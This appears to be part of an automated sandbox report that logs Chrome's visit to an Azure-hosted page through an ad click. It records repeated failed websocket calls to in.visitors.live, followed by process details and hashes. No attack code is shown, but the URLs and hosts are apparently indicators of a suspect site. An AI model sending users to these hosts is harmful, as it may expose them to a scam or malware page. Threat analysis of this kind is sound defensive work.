                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-28 12:35:41 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        61192.168.2.44988435.201.124.94435796C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-28 12:35:43 UTC554OUTGET /socket.io/?EIO=3&transport=websocket HTTP/1.1
                                                        Host: in.visitors.live
                                                        Connection: Upgrade
                                                        Pragma: no-cache
                                                        Cache-Control: no-cache
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Upgrade: websocket
                                                        Origin: https://ddbsodvnnadewe.z1.web.core.windows.net
                                                        Sec-WebSocket-Version: 13
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Sec-WebSocket-Key: +kYdFGqfF/3OgXrvXIv7YA==
                                                        Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                        2024-11-28 12:35:43 UTC218INHTTP/1.1 400 Bad Request
                                                        Content-Type: application/json
                                                        Date: Thu, 28 Nov 2024 12:35:43 GMT
                                                        Via: 1.1 google
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close
                                                        Transfer-Encoding: chunked
                                                        2024-11-28 12:35:43 UTC45INData Raw: 32 32 0d 0a 7b 22 63 6f 64 65 22 3a 33 2c 22 6d 65 73 73 61 67 65 22 3a 22 42 61 64 20 72 65 71 75 65 73 74 22 7d 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 22{"code":3,"message":"Bad request"}0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        62192.168.2.44988635.201.124.94435796C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-28 12:35:46 UTC554OUTGET /socket.io/?EIO=3&transport=websocket HTTP/1.1
                                                        Host: in.visitors.live
                                                        Connection: Upgrade
                                                        Pragma: no-cache
                                                        Cache-Control: no-cache
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Upgrade: websocket
                                                        Origin: https://ddbsodvnnadewe.z1.web.core.windows.net
                                                        Sec-WebSocket-Version: 13
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Sec-WebSocket-Key: x0MLjAAappTWUUNXZvlgrw==
                                                        Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                        2024-11-28 12:35:46 UTC218INHTTP/1.1 400 Bad Request
                                                        Content-Type: application/json
                                                        Date: Thu, 28 Nov 2024 12:35:46 GMT
                                                        Via: 1.1 google
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close
                                                        Transfer-Encoding: chunked
                                                        2024-11-28 12:35:46 UTC45INData Raw: 32 32 0d 0a 7b 22 63 6f 64 65 22 3a 33 2c 22 6d 65 73 73 61 67 65 22 3a 22 42 61 64 20 72 65 71 75 65 73 74 22 7d 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 22{"code":3,"message":"Bad request"}0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        63192.168.2.44989035.201.124.94435796C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-28 12:35:49 UTC554OUTGET /socket.io/?EIO=3&transport=websocket HTTP/1.1
                                                        Host: in.visitors.live
                                                        Connection: Upgrade
                                                        Pragma: no-cache
                                                        Cache-Control: no-cache
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Upgrade: websocket
                                                        Origin: https://ddbsodvnnadewe.z1.web.core.windows.net
                                                        Sec-WebSocket-Version: 13
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Sec-WebSocket-Key: fFodMvXldkbPEyIlh3Q2hg==
                                                        Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                        2024-11-28 12:35:49 UTC218INHTTP/1.1 400 Bad Request
                                                        Content-Type: application/json
                                                        Date: Thu, 28 Nov 2024 12:35:49 GMT
                                                        Via: 1.1 google
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close
                                                        Transfer-Encoding: chunked
                                                        2024-11-28 12:35:49 UTC45INData Raw: 32 32 0d 0a 7b 22 63 6f 64 65 22 3a 33 2c 22 6d 65 73 73 61 67 65 22 3a 22 42 61 64 20 72 65 71 75 65 73 74 22 7d 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 22{"code":3,"message":"Bad request"}0


                                                        Click to jump to process

                                                        Click to jump to process

                                                        Click to jump to process

                                                        Target ID:0
                                                        Start time:07:34:22
                                                        Start date:28/11/2024
                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                        Imagebase:0x7ff76e190000
                                                        File size:3'242'272 bytes
                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:false

                                                        Target ID:2
                                                        Start time:07:34:26
                                                        Start date:28/11/2024
                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2484 --field-trial-handle=2444,i,7551787297892426440,14419496733088316111,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                        Imagebase:0x7ff76e190000
                                                        File size:3'242'272 bytes
                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:false

                                                        Target ID:3
                                                        Start time:07:34:33
                                                        Start date:28/11/2024
                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://ddbsodvnnadewe.z1.web.core.windows.net/?gad_source=5&gclid=EAIaIQobChMI4taSwu7-iQMVTvE7Ah3nKQf9EAEYASAAEgK2EvD_BwE"
                                                        Imagebase:0x7ff76e190000
                                                        File size:3'242'272 bytes
                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:7
                                                        Start time:07:35:05
                                                        Start date:28/11/2024
                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4084 --field-trial-handle=2444,i,7551787297892426440,14419496733088316111,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                        Imagebase:0x7ff76e190000
                                                        File size:3'242'272 bytes
                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:false

                                                        No disassembly